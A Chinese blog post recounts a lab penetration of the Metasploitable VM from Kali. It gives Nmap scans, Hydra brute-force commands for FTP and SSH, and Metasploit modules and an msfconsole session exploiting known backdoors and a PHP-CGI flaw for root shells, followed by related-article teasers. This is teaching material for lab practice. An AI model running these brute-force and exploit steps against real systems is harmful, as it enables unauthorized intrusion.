kali渗透metasploitable靶机

最新推荐文章于 2025-06-10 19:37:24 发布
最新推荐文章于 2025-06-10 19:37:24 发布
阅读量2.2w 收藏 71
点赞数 8
分类专栏: 渗透测试 linux学习 metasploit
本文详细介绍了一种渗透测试流程,包括隐蔽扫描、端口爆破、登录系统及端口渗透等关键步骤。文中提供了具体工具如Nmap和Hydra的使用方法,并通过实例展示了如何利用Metasploit框架获取目标系统的root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135


端口爆破:FTP、SSH等

工具:Hydra

备用字典

  • 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

  • 爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陆系统:

端口渗透:

  • 6667——-irc_3281_backdoor

利用metasploit

成功获取会话,root权限

  • 6200——-vsftpd_234_backdoor

利用metasploit

反弹会话,root权限


  • 1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话

  • 1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回会话

  • 139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

Samba 3.0.20

利用metasploit

返回会话,root权限

  • 8180——-Apache Tomcat弱口令

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

  • 80——-PHP CGI参数注入执行漏洞

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run


Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 4158
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4377
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
手把手教你kali渗透Metasploitable
热门推荐
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Metasploitable: 2靶场渗透
最新发布
sucker的博客
06-10 695
渗透测试价值:Metasploitable靶机仍广泛用于教学,演示 从信息收集到提权 的完整链。此漏洞虽古老,但仍是理解后门漏洞原理的经典教材,实际环境中需确保无遗留 2.3.4 版本服务。4,分析目标系统的第一个暴露面,也是我们的攻击面,21端口存在的tp服务。漏洞本质:开发者故意植入或代码被篡改的后门,通过用户名中的特殊字符。后门漏洞 (CVE-2011-2523),允许未授权命令执行。6,尝试80端口的http服务漏洞利用getshell。Metasploit存在漏洞利用的模块,使用之。
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1172
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
Kali linux渗透Metasploitable2-linux实现文件上传
qq_62657502的博客
08-30 583
Kali linux渗透Metasploitable2-linux实现文件上传
kali使用Metasploit进行渗透攻击实验
ysm_zxc的博客
06-13 1005
信息安全技术
Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1654
Metasploitable2靶机渗透linux系统实操
利用kali机对metaploitable做渗透攻击
KT986的博客
06-19 2246
仅作学习参考使用 一、虚拟机&&靶机的准备 1)kali linux的安装 https://www.kali.org/get-kali/#kali-virtual-machines 2)Vmware虚拟机的安装 3)靶机metaploitable2的安装 下载地址:https://sourceforge.net.projects/metasploitable/ (如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发本人已经调试好的
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### phpmyadmin: http://192.168.0.113/phpmyadmin ### username: root password: owaspbwa
CFS三层靶机渗透_Kali
qq_42383069的博客
03-18 5993
环境搭建 0x01. 环境下载: 【CFS三层靶机环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟机网卡(新建两个仅主机模式的网卡) VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0 VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0 2)虚
kali使用msf渗透测试靶机
qq_53175607的博客
11-18 1417
kali利用metasploit使用ms17-010(永恒之蓝)渗透靶机windones7 免责声明:只用于靶机测试 1.渗透之前要关闭windones7和主机的防火墙及杀毒软件。 2.使用nmap扫描windones7 3.445端口开放,说明有ms17-010的漏洞。 4.使用命令msfconsole打开msf 5.使用search ms17-010命令查找攻击模块 6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击 use选择 7.show options
kali linux攻击靶机Metasploitable2实验------vsFTPd 2.3.4
边城浪子的博客
07-26 1208
漏洞:vsFTPd 2.3.4 靶机Metasploitable2 step1:开启kali linux 和 Metasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln 192.168.56.129 从结果中得知有高危漏洞,vsFTPd 2.3.4 step3:漏洞利用 命令:msfconsol...
KALI搭建DVWA靶机(在docker一键部署网络安全测试环境 )
qq_61901169的博客
08-15 698
点击这个,然后等一会即可进入登陆页面。就能自动打开login.php。
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
VN520的博客
12-20 2039
Metasploit framework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
kali渗透综合靶机(八)--Billu_b0x靶机
W小哥
03-17 3260
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Billu_b0x靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.59.129 靶机IP:192.168.59.131 1...
kali linux 下搭建 Vulhub 靶场(图文详解)
m0_63521991的博客
08-08 7026
【在kali linux 下搭建vulhub靶场及其依赖】关于kali、docker、vulhub的简介,靶场的开启、关闭、注意事项
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. MetasploitableMetasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值